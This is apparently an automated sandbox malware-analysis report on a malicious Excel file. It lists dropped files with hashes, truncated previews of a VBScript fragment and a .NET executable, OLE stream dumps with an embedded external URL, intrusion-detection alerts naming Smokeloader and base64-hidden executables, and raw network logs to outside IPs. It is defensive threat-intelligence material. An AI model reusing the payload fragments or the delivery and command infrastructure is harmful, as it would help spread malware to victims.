                                  SSDEEP:1536:Igwd99COby6Cyc12taJK6d9gjh8W0/5JpXe1cNUg0B0bUZlu9gISsR5:XwdPUJK6L/Kcig0B0ci
                                  MD5:5CFD67486E857744CCC14E2DEF9FF318
                                  SHA1:4049E46FE68A2B97F3F6C7170A7FB859D097F88E
                                  SHA-256:D14DB1AEC62AA5C55D3E507CF9502A6D2E26C9F1C3FB55FE9649FF8576AF02B3
                                  SHA-512:6EC2A3C304A84468A2FF4CD26A4B74C05FA212794A5E7BDCFB538A35CBD560075541097450689833841CFC5D01020C1AB762F20D855E416033CCFFAF7E62E6EF
                                  Malicious:true
                                  Preview:......F.u.n.c.t.i.o.n. .W.M.I.D.a.t.e.S.t.r.i.n.g.T.o.D.a.t.e.(.d.t.m.E.v.e.n.t.D.a.t.e.).........W.M.I.D.a.t.e.S.t.r.i.n.g.T.o.D.a.t.e. .=. .C.D.a.t.e.(.M.i.d.(.d.t.m.E.v.e.n.t.D.a.t.e.,. .5.,. .2.). .&. ."./.". .&. ._.....M.i.d.(.d.t.m.E.v.e.n.t.D.a.t.e.,. .7.,. .2.). .&. ."./.". .&. .L.e.f.t.(.d.t.m.E.v.e.n.t.D.a.t.e.,. .4.). ._.....&. .". .". .&. .M.i.d. .(.d.t.m.E.v.e.n.t.D.a.t.e.,. .9.,. .2.). .&. .".:.". .&. ._.....M.i.d.(.d.t.m.E.v.e.n.t.D.a.t.e.,. .1.1.,. .2.). .&. .".:.". .&. .M.i.d.(.d.t.m.E.v.e.n.t.D.a.t.e.,. ._.....1.3.,. .2.).).........E.n.d. .F.u.n.c.t.i.o.n.....'././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.....'././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.....F.u.n.c.t.i.o.n. .g.e.t.D.e.s.c.r.i.p.t.i.o.n.(.s.t.
                                  Process:C:\Windows\explorer.exe
                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:dropped
                                  Size (bytes):64704
                                  Entropy (8bit):6.02370063609959
                                  Encrypted:false
                                  SSDEEP:768:f8XcJiMjm2ieHlPyCsSuJbn8dBhFRHSMM6Iq8HSYDKJENf+i6CBpTX:TYMaNylPYSAb8dBnhHr4DKKNf+GBp
                                  MD5:8FE9545E9F72E460723F484C304314AD
                                  SHA1:3718A40FFC3AF2613B8B5FE41C475D85FF0522F4
                                  SHA-256:D2F0B87E2D2707685C4D35F8F05B42FB8326EF4E70D16097B8837DABA06AC961
                                  SHA-512:0738526EB2E6C485528C6B5A8DDABB51F095C134E010F9F3F25F341ABBE7A63072B0E2C2B161713D28B93F2A33C1476A0FED2D64FF86C9547DA9AF34DC90529A
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                  Joe Sandbox View:
                                  • Filename: Requirements.xla.xlsx, Detection: malicious, Browse
                                  • Filename: vns.exe, Detection: malicious, Browse
                                  • Filename: Doc606112.xls, Detection: malicious, Browse
                                  • Filename: SWIFT26794306.xlam.xlsx, Detection: malicious, Browse
                                  • Filename: Enquiry#234342.xlam.xlsx, Detection: malicious, Browse
                                  • Filename: Profoma.xls, Detection: malicious, Browse
                                  • Filename: Scan_doc000680092112202023130.xlam.xlsx, Detection: malicious, Browse
                                  • Filename: SecuriteInfo.com.Win32.RansomX-gen.23647.22068.exe, Detection: malicious, Browse
                                  • Filename: e-Profile.js, Detection: malicious, Browse
                                  • Filename: Orden_581278118.xlam.xlsx, Detection: malicious, Browse
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...pn.\..............0.............^.... ........@.. ....................... ............`.....................................O.......8................>........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P...*..0.."........(......-.r...p.rI..p(....s....z.*...0..........(....~P.....o......*..(....*n(.....(..........%...(....*~(.....(..........%...%...(....*.(.....(..........%...%...%...(....*V.(......}Q.....}R...*..{Q...*..{R...*...0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......
                                  Process:C:\Windows\explorer.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):339146
                                  Entropy (8bit):7.9994598443987135
                                  Encrypted:true
                                  SSDEEP:6144:upKljPiUGxnSO5u8cimwevw560/gXW4HUrr85GJm0n9eE9/7zBNfZQ:u2GxSOAvs4HCr8e979zLe
                                  MD5:E23E067B88551F314FB3EA02C5657B0E
                                  SHA1:4FB9A3B990E9AB415E56DEA042AEC5633CB6D444
                                  SHA-256:4ED8F97F1B86101728DAA99BA5307373E2BEBF00BD7A97899FE1A98FA74228C3
                                  SHA-512:82EC3E73665BF2A01E2124FE8305C1A86E2B2D4CF06DE8979098D243ACCD121B51B89DC3D63D71BA9D05D9C5FA60E452F2E7B139DA6FBBEF75A7B1694DADF7D3
                                  Malicious:false
                                  Preview:.p.P.%.2.f...b*.=..~.mE(U2......tE...Wq.u.B....0.>.a=i.v....O.a..3v..D..........U#...*.c.k....V.U...{.[..HX.W.Gg...tT:...?.lj~..Q........OLE.^..N.Z..d.t...$.....>..;t.L..........|..]6>.(..........iq....\....k...aHa....K.^..+*..%;/~..nC?.=,..q-.C_..W1~...71.d.HD$..nL.G..."..tQ....u=...S..O..u..@.......=..n&..C..U.2y ...(......9..q...{...p.].y...}6O....e\...G#[ng.v.G...w..Gu/..//../a.h...M..N;.d.UR.......z......d..\a...K...v...a..<}.u.@..u..,(e/...U".....~s..J....H.B.F]n.>.....V0>...%Z.TLG..X.!....:.7.*.b.$.UHW..................J....{K.....v..3..Y.nX...Sc..uB.l....-S.r1.N(.V..T....>..h........ypVJN.^...R..Z.i./%..yhA.v.|g<.Q...U. ...E.n..jQ....D.....Al..(.s..&_.A.\........:h.......A...OT.".:7.E.9V......'OCo..X..GN........Z.. .[W+...a..8B.+y..l.....%4H],)_.W...t...d.4.?m........wU..P.....1e.....d.].h.m..jg.&..e....og...,B.oQ.M.P{...Z..!8..y......X..&6P.....D...]...W..Nl.f...!$KD.[3.Y../..*....:.?V%....]...7...?.+_-..=..Ls....U.I._.
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon May 27 17:35:43 2024, Security: 1
                                  Category:dropped
                                  Size (bytes):107008
                                  Entropy (8bit):7.843883580365994
                                  Encrypted:false
                                  SSDEEP:3072:yK4QBKGE6F1gM9tZKl2HCKMklsJnbvdfgqtC:yK5F1XtZKeCtk+BloqY
                                  MD5:C3BEFBA7277EAD63C018B03AF0A29327
                                  SHA1:0340EC0467F0023ED8E1F66F8D7DE5778CEEA937
                                  SHA-256:EC795DF807E407789F79E6E54D281BFBAC4F87C35EF427129A2A221B81DD04DC
                                  SHA-512:38260DA86D5FF807869BF92B1B91E6EE677847A37D0C76FD00B94D1545829566764B2B14D581B84AF4BA00D21D007349F5F5C65159B209998275519257F08234
                                  Malicious:false
                                  Preview:......................>..................................."...................d........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!...............%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...e.......f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon May 27 17:35:43 2024, Security: 1
                                  Category:dropped
                                  Size (bytes):107008
                                  Entropy (8bit):7.843883580365994
                                  Encrypted:false
                                  SSDEEP:3072:yK4QBKGE6F1gM9tZKl2HCKMklsJnbvdfgqtC:yK5F1XtZKeCtk+BloqY
                                  MD5:C3BEFBA7277EAD63C018B03AF0A29327
                                  SHA1:0340EC0467F0023ED8E1F66F8D7DE5778CEEA937
                                  SHA-256:EC795DF807E407789F79E6E54D281BFBAC4F87C35EF427129A2A221B81DD04DC
                                  SHA-512:38260DA86D5FF807869BF92B1B91E6EE677847A37D0C76FD00B94D1545829566764B2B14D581B84AF4BA00D21D007349F5F5C65159B209998275519257F08234
                                  Malicious:false
                                  Preview:......................>..................................."...................d........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!...............%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...e.......f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):26
                                  Entropy (8bit):3.95006375643621
                                  Encrypted:false
                                  SSDEEP:3:ggPYV:rPYV
                                  MD5:187F488E27DB4AF347237FE461A079AD
                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                  Malicious:false
                                  Preview:[ZoneTransfer]....ZoneId=0
                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Sun May 26 18:29:10 2024, Security: 1
                                  Entropy (8bit):7.818406558483891
                                  TrID:
                                  • Microsoft Excel sheet (30009/1) 78.94%
                                  • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                  File name:#20240627_Edlen_A.xls
                                  File size:104'960 bytes
                                  MD5:74cb59a86f4df8375836fd2bc3bbfd08
                                  SHA1:11745387b652df3e64697fc430d207251fb70fdd
                                  SHA256:72701fd89271a881e14bfb170ee86d28f5c08fdb73f1be8c6904337c102bf7d7
                                  SHA512:c2238dc90675b7c91688e1388cbfbcdd66188fdd46a36dbe0e725afc1dbba2a5a0fbfebbea278bebca46138a718010c8ae9bedab9b4c4c5190b813e0e8b13dac
                                  SSDEEP:1536:wTjKXZuqDBMmz9ntWp8eeej47Wnj85IrJI7reF+/DfghBUZFkMgdQ94QgLJ0:CK4QBMK9ntqj40jEgJIfeEbfbZF6j
                                  TLSH:A2A312BB9106C5F0D2A95C3CC9D1B2A09610AE6412DB4C56BBCDFB4C98B42E766C335B
                                  File Content Preview:........................>..................................."...................d..............................................................................................................................................................................
                                  Icon Hash:276ea3a6a6b7bfbf
                                  Document Type:OLE
                                  Number of OLE Files:1
                                  Has Summary Info:
                                  Application Name:Microsoft Excel
                                  Encrypted Document:True
                                  Contains Word Document Stream:False
                                  Contains Workbook/Book Stream:True
                                  Contains PowerPoint Document Stream:False
                                  Contains Visio Document Stream:False
                                  Contains ObjectPool Stream:False
                                  Flash Objects Count:0
                                  Contains VBA Macros:False
                                  Code Page:1252
                                  Author:
                                  Last Saved By:
                                  Create Time:2006-09-16 00:00:00
                                  Last Saved Time:2024-05-26 17:29:10
                                  Creating Application:Microsoft Excel
                                  Security:1
                                  Document Code Page:1252
                                  Thumbnail Scaling Desired:False
                                  Contains Dirty Links:False
                                  Shared Document:False
                                  Changed Hyperlinks:False
                                  Application Version:786432
                                  General
                                  Stream Path:\x1CompObj
                                  CLSID:
                                  File Type:data
                                  Stream Size:114
                                  Entropy:4.25248375192737
                                  Base64 Encoded:True
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                  General
                                  Stream Path:\x5DocumentSummaryInformation
                                  CLSID:
                                  File Type:data
                                  Stream Size:244
                                  Entropy:2.889430592781307
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                  General
                                  Stream Path:\x5SummaryInformation
                                  CLSID:
                                  File Type:data
                                  Stream Size:200
                                  Entropy:3.2603503175049817
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . 7 . . . . . . . . .
                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                  General
                                  Stream Path:MBD00057C23/\x1CompObj
                                  CLSID:
                                  File Type:data
                                  Stream Size:99
                                  Entropy:3.631242196770981
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                  General
                                  Stream Path:MBD00057C23/Package
                                  CLSID:
                                  File Type:Microsoft Excel 2007+
                                  Stream Size:15635
                                  Entropy:7.5397806632886
                                  Base64 Encoded:True
                                  Data ASCII:P K . . . . . . . . . . ! . D . 2 . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                  Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 44 19 a7 ee 32 01 00 00 c9 02 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                  General
                                  Stream Path:MBD00057C24/\x1Ole
                                  CLSID:
                                  File Type:data
                                  Stream Size:338
                                  Entropy:5.7103814357851395
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . " U y . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . : . / . / . z . 2 . . . i . n . k . / . n . X . P . J . . . k W m . . Z g y . . $ . . . . , g c p } . . u . f . . . [ V . . A v _ L \\ . P . ( Q . . u S n ) " v ? . . E . d . . 9 * : . . . . . . . . . . . . . . . . . R . . . m . Q . c . z . P . i . F . P . w . u . I . T . E . K . 1 . G . 3 . 6 . 0 . Q . C . o . Y . D . e . g . w . s . m . f . I . G . y . 3 . f . U . F . R . t . 5 . . . z . _ 0 b . ' C ~ . . o x 5 ] ] .
                                  Data Raw:01 00 00 02 d9 e1 06 22 df 55 87 79 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 9c 00 00 00 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 7a 00 32 00 2e 00 69 00 6e 00 6b 00 2f 00 6e 00 58 00 50 00 4a 00 00 00 6b fd 57 ab d9 f0 6d 89 96 f4 9f 9f 02 87 c7 98 85 5a 67 79 cb 92 e4 d9 fd 09 c3 24 13 8c f2 da 00 1b 03 cb ff 2c 67 63 cf e9
                                  General
                                  Stream Path:Workbook
                                  CLSID:
                                  File Type:Applesoft BASIC program data, first line number 16
                                  Stream Size:83519
                                  Entropy:7.9899585112149865
                                  Base64 Encoded:True
                                  Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . . . F @ * i . A F K o t Q z . _ < . @ S . ] . , = . . . . . . . ~ . . . . \\ . p . . . . z 3 \\ # x F 9 @ M . . p + . x . / . p Q o q S . 0 . N . . D w . Q . . R . ; % . . . J . . % . = . = B . . . > ^ a . . . X . . . = . . . = . w . . . Y d . . . | . ] . . . _ [ . . . . . , . . . . 0 . . . . ! . . . ~ . . . R F = . . . i . L _ . j , 5 . @ . . . p . . . . . w " . . . . . . . . . T . . . $ . . . j y 1 . . . @ i u . K g H _ P > . . f 1 . . . Y ` [ . z 5
                                  Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 fa c1 00 05 19 46 af 40 2a ef a7 ed 69 98 c0 1c ea 41 46 ce 4b eb af 6f 83 cc c3 74 89 20 51 7a 8b d3 af 5f bf 3c 0c 40 53 0f 5d 09 2c 3d b8 b0 e1 00 02 00 b0 04 c1 00 02 00 7e 0c e2 00 00 00 5c 00 70 00 0c 93 e4 a6 b4 95 83 9a f3 08 c9 c3 7a bd ae 33 df 5c 23 9f 78 46 39 c5 40 a9 d6 4d 15 06
                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                  05/27/24-18:36:08.149095TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4917680192.168.2.2277.232.129.190
                                  05/27/24-18:35:39.953040TCP2049038ET TROJAN Malicious Base64 Encoded Payload In Image44349174188.114.97.3192.168.2.22
                                  05/27/24-18:35:37.303035TCP2018856ET TROJAN Windows executable base64 encoded44349174188.114.97.3192.168.2.22
                                  05/27/24-18:35:37.303035TCP2047750ET TROJAN Base64 Encoded MZ In Image44349174188.114.97.3192.168.2.22
                                  05/27/24-18:35:39.401568TCP2025012ET TROJAN Powershell commands sent B64 344349174188.114.97.3192.168.2.22
                                  TimestampSource PortDest PortSource IPDest IP
                                  May 27, 2024 18:35:10.722431898 CEST4916180192.168.2.2254.241.153.192
                                  May 27, 2024 18:35:10.727489948 CEST804916154.241.153.192192.168.2.22
                                  May 27, 2024 18:35:10.727582932 CEST4916180192.168.2.2254.241.153.192
                                  May 27, 2024 18:35:10.727703094 CEST4916180192.168.2.2254.241.153.192
                                  May 27, 2024 18:35:10.732584953 CEST804916154.241.153.192192.168.2.22
                                  May 27, 2024 18:35:11.326527119 CEST804916154.241.153.192192.168.2.22
                                  May 27, 2024 18:35:11.326744080 CEST4916180192.168.2.2254.241.153.192
                                  May 27, 2024 18:35:11.331583977 CEST4916280192.168.2.22198.46.177.156
                                  May 27, 2024 18:35:11.337372065 CEST8049162198.46.177.156192.168.2.22
                                  May 27, 2024 18:35:11.337450981 CEST4916280192.168.2.22198.46.177.156
                                  May 27, 2024 18:35:11.337543011 CEST4916280192.168.2.22198.46.177.156
                                  May 27, 2024 18:35:11.343558073 CEST8049162198.46.177.156192.168.2.22
                                  May 27, 2024 18:35:12.002454042 CEST8049162198.46.177.156192.168.2.22
                                  May 27, 2024 18:35:12.002532959 CEST8049162198.46.177.156192.168.2.22
                                  May 27, 2024 18:35:12.002616882 CEST8049162198.46.177.156192.168.2.22
                                  May 27, 2024 18:35:12.002652884 CEST8049162198.46.177.156192.168.2.22
                                  May 27, 2024 18:35:12.002684116 CEST4916280192.168.2.22198.46.177.156
                                  May 27, 2024 18:35:12.002690077 CEST8049162198.46.177.156192.168.2.22
                                  May 27, 2024 18:35:12.002684116 CEST4916280192.168.2.22198.46.177.156
                                  May 27, 2024 18:35:12.002684116 CEST4916280192.168.2.22198.46.177.156
                                  May 27, 2024 18:35:12.002726078 CEST4916280192.168.2.22198.46.177.156
                                  May 27, 2024 18:35:12.002727032 CEST8049162198.46.177.156192.168.2.22
                                  May 27, 2024 18:35:12.002742052 CEST4916280192.168.2.22198.46.177.156
                                  May 27, 2024 18:35:12.002763033 CEST8049162198.46.177.156192.168.2.22
                                  May 27, 2024 18:35:12.002782106 CEST4916280192.168.2.22198.46.177.156
                                  May 27, 2024 18:35:12.002798080 CEST8049162198.46.177.156192.168.2.22
                                  May 27, 2024 18:35:12.002815962 CEST4916280192.168.2.22198.46.177.156
                                  May 27, 2024 18:35:12.002831936 CEST8049162198.46.177.156192.168.2.22
                                  May 27, 2024 18:35:12.002850056 CEST4916280192.168.2.22198.46.177.156
                                  May 27, 2024 18:35:12.002868891 CEST8049162198.46.177.156192.168.2.22
                                  May 27, 2024 18:35:12.002883911 CEST4916280192.168.2.22198.46.177.156
                                  May 27, 2024 18:35:12.002926111 CEST4916280192.168.2.22198.46.177.156
                                  May 27, 2024 18:35:12.007945061 CEST8049162198.46.177.156192.168.2.22
                                  May 27, 2024 18:35:12.008009911 CEST4916280192.168.2.22198.46.177.156
                                  May 27, 2024 18:35:12.008023024 CEST8049162198.46.177.156192.168.2.22
                                  May 27, 2024 18:35:12.008058071 CEST8049162198.46.177.156192.168.2.22
                                  May 27, 2024 18:35:12.008073092 CEST4916280192.168.2.22198.46.177.156
                                  May 27, 2024 18:35:12.008111000 CEST4916280192.168.2.22198.46.177.156
                                  May 27, 2024 18:35:12.008879900 CEST4916280192.168.2.22198.46.177.156
                                  May 27, 2024 18:35:12.110560894 CEST8049162198.46.177.156192.168.2.22
                                  May 27, 2024 18:35:12.110584974 CEST8049162198.46.177.156192.168.2.22
                                  May 27, 2024 18:35:12.110667944 CEST4916280192.168.2.22198.46.177.156
                                  May 27, 2024 18:35:12.110909939 CEST8049162198.46.177.156192.168.2.22
                                  May 27, 2024 18:35:12.110937119 CEST8049162198.46.177.156192.168.2.22
                                  May 27, 2024 18:35:12.111000061 CEST4916280192.168.2.22198.46.177.156
                                  May 27, 2024 18:35:12.115431070 CEST8049162198.46.177.156192.168.2.22
                                  May 27, 2024 18:35:12.115449905 CEST8049162198.46.177.156192.168.2.22
                                  May 27, 2024 18:35:12.115520000 CEST4916280192.168.2.22198.46.177.156
                                  May 27, 2024 18:35:12.115758896 CEST8049162198.46.177.156192.168.2.22
                                  May 27, 2024 18:35:12.115788937 CEST8049162198.46.177.156192.168.2.22
                                  May 27, 2024 18:35:12.115813971 CEST4916280192.168.2.22198.46.177.156
                                  May 27, 2024 18:35:12.115847111 CEST4916280192.168.2.22198.46.177.156
                                  May 27, 2024 18:35:12.120486021 CEST8049162198.46.177.156192.168.2.22
                                  May 27, 2024 18:35:12.120518923 CEST8049162198.46.177.156192.168.2.22
                                  May 27, 2024 18:35:12.120528936 CEST8049162198.46.177.156192.168.2.22
                                  May 27, 2024 18:35:12.120538950 CEST8049162198.46.177.156192.168.2.22
                                  May 27, 2024 18:35:12.120553017 CEST8049162198.46.177.156192.168.2.22
                                  May 27, 2024 18:35:12.120556116 CEST4916280192.168.2.22198.46.177.156
                                  May 27, 2024 18:35:12.120721102 CEST4916280192.168.2.22198.46.177.156
                                  May 27, 2024 18:35:12.854311943 CEST4916280192.168.2.22198.46.177.156
                                  May 27, 2024 18:35:13.023293972 CEST4916380192.168.2.2254.241.153.192
                                  May 27, 2024 18:35:13.028280020 CEST804916354.241.153.192192.168.2.22
                                  May 27, 2024 18:35:13.028337955 CEST4916380192.168.2.2254.241.153.192
                                  May 27, 2024 18:35:13.028472900 CEST4916380192.168.2.2254.241.153.192
                                  May 27, 2024 18:35:13.033343077 CEST804916354.241.153.192192.168.2.22
                                  May 27, 2024 18:35:13.630913973 CEST804916354.241.153.192192.168.2.22
                                  May 27, 2024 18:35:13.630934000 CEST804916354.241.153.192192.168.2.22
                                  May 27, 2024 18:35:13.631000042 CEST804916354.241.153.192192.168.2.22
                                  May 27, 2024 18:35:13.631078959 CEST804916354.241.153.192192.168.2.22
                                  May 27, 2024 18:35:13.631094933 CEST804916354.241.153.192192.168.2.22
                                  May 27, 2024 18:35:13.631226063 CEST4916380192.168.2.2254.241.153.192
                                  May 27, 2024 18:35:13.631227016 CEST4916380192.168.2.2254.241.153.192
                                  May 27, 2024 18:35:13.631227016 CEST4916380192.168.2.2254.241.153.192
                                  May 27, 2024 18:35:13.631227016 CEST4916380192.168.2.2254.241.153.192
                                  May 27, 2024 18:35:13.631227016 CEST4916380192.168.2.2254.241.153.192
                                  May 27, 2024 18:35:13.631287098 CEST804916354.241.153.192192.168.2.22
                                  May 27, 2024 18:35:13.631303072 CEST804916354.241.153.192192.168.2.22
                                  May 27, 2024 18:35:13.631326914 CEST804916354.241.153.192192.168.2.22
                                  May 27, 2024 18:35:13.631345987 CEST4916380192.168.2.2254.241.153.192
                                  May 27, 2024 18:35:13.631345987 CEST4916380192.168.2.2254.241.153.192
                                  May 27, 2024 18:35:13.631366968 CEST4916380192.168.2.2254.241.153.192
                                  May 27, 2024 18:35:13.631530046 CEST804916354.241.153.192192.168.2.22
                                  May 27, 2024 18:35:13.631546974 CEST804916354.241.153.192192.168.2.22
                                  May 27, 2024 18:35:13.631591082 CEST4916380192.168.2.2254.241.153.192
                                  May 27, 2024 18:35:13.631591082 CEST4916380192.168.2.2254.241.153.192
                                  May 27, 2024 18:35:13.633425951 CEST4916380192.168.2.2254.241.153.192
                                  May 27, 2024 18:35:13.633460045 CEST4916380192.168.2.2254.241.153.192
                                  May 27, 2024 18:35:13.636672020 CEST804916354.241.153.192192.168.2.22
                                  May 27, 2024 18:35:13.636733055 CEST4916380192.168.2.2254.241.153.192
                                  May 27, 2024 18:35:13.636742115 CEST804916354.241.153.192192.168.2.22
                                  May 27, 2024 18:35:13.636794090 CEST4916380192.168.2.2254.241.153.192
                                  May 27, 2024 18:35:13.636823893 CEST804916354.241.153.192192.168.2.22
                                  May 27, 2024 18:35:13.636873007 CEST4916380192.168.2.2254.241.153.192
                                  May 27, 2024 18:35:14.086366892 CEST4916480192.168.2.2254.241.153.192
                                  May 27, 2024 18:35:14.091722965 CEST804916454.241.153.192192.168.2.22
                                  May 27, 2024 18:35:14.091805935 CEST4916480192.168.2.2254.241.153.192
                                  May 27, 2024 18:35:14.116738081 CEST4916480192.168.2.2254.241.153.192
                                  May 27, 2024 18:35:14.121737003 CEST804916454.241.153.192192.168.2.22
                                  May 27, 2024 18:35:14.713757992 CEST804916454.241.153.192192.168.2.22
                                  May 27, 2024 18:35:14.713804007 CEST804916454.241.153.192192.168.2.22
                                  May 27, 2024 18:35:14.713840008 CEST804916454.241.153.192192.168.2.22
                                  May 27, 2024 18:35:14.713871956 CEST4916480192.168.2.2254.241.153.192
                                  May 27, 2024 18:35:14.713908911 CEST4916480192.168.2.2254.241.153.192
                                  May 27, 2024 18:35:14.713918924 CEST804916454.241.153.192192.168.2.22
                                  May 27, 2024 18:35:14.713953018 CEST804916454.241.153.192192.168.2.22
                                  May 27, 2024 18:35:14.713979959 CEST4916480192.168.2.2254.241.153.192
